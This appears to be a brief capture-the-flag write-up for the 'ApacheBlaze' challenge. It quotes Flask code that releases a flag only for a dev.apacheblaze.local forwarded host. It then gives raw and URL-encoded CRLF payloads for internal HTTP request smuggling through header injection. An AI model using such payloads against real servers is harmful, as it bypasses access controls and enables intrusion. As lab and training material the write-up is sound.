Skip to content

ApacheBlaze

elif game == 'click_topia':
        if request.headers.get('X-Forwarded-Host') == 'dev.apacheblaze.local':
            return jsonify({
                'message': f'{app.config["FLAG"]}'
            }), 200
        else:
            return jsonify({
                'message': 'This game is currently available only from dev.apacheblaze.local.'
            }), 200

According to the source code, I added X-Forwarded-Host: dev.apacheblaze.local into the request header. But, it didn't work. So, I decided to deploy the source code locally on Docker container.

$ python -m venv .venv
$ source .venv/bin/activate

$ chmod +x build_docker.sh
$ ./build_docker.sh

Internal HTTP Request Smuggling via Header Injection

# POC
 HTTP/1.1\r\nHost: localhost\r\n\r\nGET /SMUGGLED
%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED


# Reminder for encoding : 

\r\n     ->  %0d%0a
\r\n\r   ->  %0d%0a%0d

# tailor to fit 
 HTTP/1.1\r\nHost: dev.apacheblaze.local\r\n\r\nGET 
%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local%0d%0a%0d%0aGET%20

%20HTTP/1.1%0D%0AHost:%20dev.apacheblaze.local%0D%0A%0D%0AGET%20

alt text